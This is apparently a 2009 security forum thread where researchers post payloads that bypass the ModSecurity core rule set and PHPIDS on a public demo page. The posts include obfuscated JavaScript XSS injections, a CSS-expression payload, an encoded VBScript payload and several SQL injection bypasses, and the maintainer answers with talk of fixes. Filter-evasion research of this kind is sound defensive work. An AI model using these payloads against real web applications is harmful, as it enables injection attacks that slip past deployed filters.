Let the fun begin! :)

http://bit.ly/2hHTsX


OOOOPPPSSS lol
http://tinyurl.com/yzbxz5v

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/12/2009 09:23AM by Gareth Heyes.

lol, nice 1

i developed this while listening to Ryan's owasp talk on mod security and the new demo page: http://pastebin.ca/1668658

it doesn't work if you pass it in as a GET param (new line chars trigger the mod security response splitting filter) so cut/paste it into the text box.

interesting notes: i got it working in php-ids first. when i tried it on the mod security demo page, i was triggering one filter that php-ids wasn't. a simple tweak to the injection and it bypassed both.

injection is:

__=''
$$$$=__+'t(0),1'
$$$=__
$$=__+'e'
__=__+'__par'
_=$$+'val'
x1=1+$$$+[]
z=$$+'nt__'
x1=x1[__+z]
x1=x1[_]
y=x1('aler'+$$$$)
x1(y)
'abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_'

Working on a fix for these type attacks. Addmittedly a bit lame at the moment, but stopping this attach and similar ones.

-B

Yeah, this is re-enforcing what we already knew after discussing the translation of the default_filters.xml data into ModSecurity's rules language with Mario. While we have converted some of the normalization functions from the Converter.php code into ModSecurity SecRules, there are still some that we are missing (namely the conversion of various quotes into just double-qoutes) and thus some of the signatures aren't matching in the CRS demo when they are in the phpids smoketest page. The other missing component is the Centrifuge detection which is the other category of items that our demo has missed and phpids has caught thus far.

What I believe needs to be done is to get the Converter.php code ported over to a Lua script that can be used in ModSecurity.

Anyone want to tackle this project??? :)

This bypasses the modsecurity rules:-

<div/style=`-:expressio&#x5c&#x36&#x65(\u006&#x34;omai&#x6e=x)` x=modsecurity.org>

changes document.domain to modsecurity.org

I'd bypass the PHPIDS rule as well but seen as the demo doesn't display it or tell me which one it is I couldn't be bothered

Explanation:-
-I used css escapes for the "n" along with malformed hex html entities
-For the domain assignment I use unicode js escapes with hex entity encoding
-x is obtained from the html attribute and automatically is in scope of the expression
-`` are used to bypass style injection rules

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/17/2009 08:57AM by Gareth Heyes.

mysql''x'and'1'like'1
mysql''x'and'1'like'0

It is possible to bypass a lot of rules using NBSP (NO-BREAK SPACE U+00A0), for example:

http://www.modsecurity.org/demo/phpids?test=%27%a0and%201%20%a0=%a0%272



Edited 1 time(s). Last edit at 11/21/2009 07:15AM by lightos.

'|' 1
' and 1.^.1/' 1
' and 1.^' 2

Modsecurity + phpids

VBScript.Encode:&#x23&#x40&#x7e&#x5e;CAAAAA&#x3d&#x3d&#x5cko&#x24K6,FoQIAAA&#x3d&#x3d&#x5e&#x23&#x7e&#x40

:D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

sql'xor' 1
sql'having~! '

'group by'1'having'1

null''null'|locate(uname, 'lightos') and '1

'''and~1/null||null-1 or uname sounds like 'lightos

2a'-1.and'0'|find_in_set(uname, 'lightos' ) and '1

'-1-0 union select-1,(select `table_name` from `information_schema`.tables limit 1) and '1 (phpids only)



Edited 2 time(s). Last edit at 11/26/2009 06:22AM by lightos.

nice ones =)

I declare this thread pointless and no fun. Modsecurity is snake oil

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yeah, the format of the demo is not ideal. It needs some work. The demo does not really test ModSecurity very well, but rather tests the core rule set. The better the rule set, the better the demo would be. We cannot tailor the rule set for the demo that does not actually protect anything.

Snake oil though? I think that is pushing it a bit. I guess, though, you can call any WAF/IDS/IPS with just an on/off switch snake oil and that is pretty much what demos are. So I'll give you that - demos like this are snake oil, but that does not mean the product being demoed is. Turning what we have in the demo on in a real site would be full of false positives as the demo is designed to be as generic as possible. However, in the real world you would have real apps installed behind ModSecurity and more targeted rules. You would not care so much for some of the crazy encodings against technology that is not in use anyhow.

Additionally, ModSecurity is not all about blocking, but also about auditing and visibility into your app. People are way too into blocking right now and a WAF/IPS that does block will need to be tuned to avoid FP to avoid loss of revenue, etc. Nothing is going to be 100% fool proof and that keeps you employed, so be happy there ;)

We put the demo up because people asked for it. It is not perfect, but it does help tune the core rule set. In hindsight maybe the demo was a bad idea as it does not help that much. Something more fun would be a challenge against a real website. I would not hold my breath for something like that, though, as vendors get berated for not putting up demos, then when they do they get berated for that, too, so why should a vendor bother with it? It is just added maintenance and time.

-B